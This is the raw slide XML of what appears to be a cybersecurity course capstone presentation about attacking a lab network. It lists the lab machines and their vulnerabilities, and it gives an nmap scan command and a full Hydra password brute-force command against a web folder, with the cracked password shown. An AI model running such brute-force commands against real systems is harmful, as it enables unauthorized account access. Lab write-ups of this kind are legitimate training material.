            <a:ext cx="1814100" cy="39381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i="1" lang="en" sz="1100"/>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>Address Range:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>192.168.1.0 - 192.168.1.255</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Netmask:192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Gateway:Microsoft Azure Labs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i="1" lang="en" sz="1100"/>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>OS: Kali GNU</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Hostname:Kali</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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>4:192.168.1.0</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>OS: Ubuntu</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Hostname: Capstone</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IPv4:192.168.1.0</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>OS: Ubuntu</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Hostname:Elk</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IPv4:192.168.1.0</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Hostname: Hypervisor</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pic>
        <p:nvPicPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2380775" y="650375"/>
            <a:ext cx="3378000" cy="4142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5" name="Google Shape;1065;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6" name="Google Shape;1066;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7" name="Google Shape;1067;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3" name="Google Shape;1073;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4" name="Google Shape;1074;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5" name="Google Shape;1075;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{784513AA-70C6-4EE7-986C-14EDB2FAD2FF}</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b="1" lang="en" sz="1800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</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b="1" lang="en" sz="1800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.90</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800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacking Machine</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sz="1800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone</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192.168.1.105</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800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerable Machine</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sz="1800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK</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192.168.1.100</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800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Elk Stack Server</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sz="1800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hyper-V Manager</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="18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(ML-RefVm-684472)</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192.168.1.1</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800">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Host Machine (Monitor Logs with Kibana)</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="18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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1081" name="Google Shape;108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2" name="Google Shape;1082;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3" name="Google Shape;1083;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{784513AA-70C6-4EE7-986C-14EDB2FAD2FF}</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i="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Use the CVE number if it exists. Otherwise, use the common name.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Describe the vulnerability.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200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Describe what this vulnerability allows the attacker to do.</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b="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open Port : 80</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Opens the HTTP Port to allow nodes in the network to connect to the server via web browser</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200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>It allows unauthorized servers in the network access to sensitive data</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b="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>No Account Lockout Policy</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Files in the server are password protected but do not lock out users after a certain amount of failed login attempts</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200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attackers can use password cracking tools and brute force a login</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b="1" lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>WebDAV</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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CVE-2004-0398</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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CVSS : 7.5</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>WebDAV allows clients to perform remote Web content authoring operations.</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200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attackers can upload malicious files such as a reverse shell to gain root access to the server</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Open Port 80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089;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0" name="Google Shape;1090;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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="1" i="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This vulnerability was located via Nmap that was able to view all open ports on the server.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Command used :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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr i="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2" name="Google Shape;1092;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1093" name="Google Shape;109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4" name="Google Shape;109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61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1096" name="Google Shape;1096;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7" name="Google Shape;1097;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8" name="Google Shape;1098;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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="1" i="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This exploit identified that it is possible to view the servers files via Web Browser</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6530075" y="887900"/>
            <a:ext cx="2152475" cy="2495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6530075" y="3383200"/>
            <a:ext cx="2152475" cy="1423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No Account Lockout Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Google Shape;1107;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8" name="Google Shape;1108;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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="1" i="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rPr>
              <a:t>Hydra, a pre-installed linux parallelized network login cracker was used to exploit this vulnerability</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Command Used :</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1111" name="Google Shape;1111;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2" name="Google Shape;1112;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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1114" name="Google Shape;1114;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5" name="Google Shape;1115;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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="1" i="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Once completed the tool cracked the password that was protecting the company secret_folder.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="Google Shape;1118;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As seen in the screenshot below it can be seen that the password was “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>leopoldo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1121" name="Google Shape;1121;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2" name="Google Shape;1122;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3" name="Google Shape;1123;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576300" y="3291775"/>
            <a:ext cx="5142576" cy="89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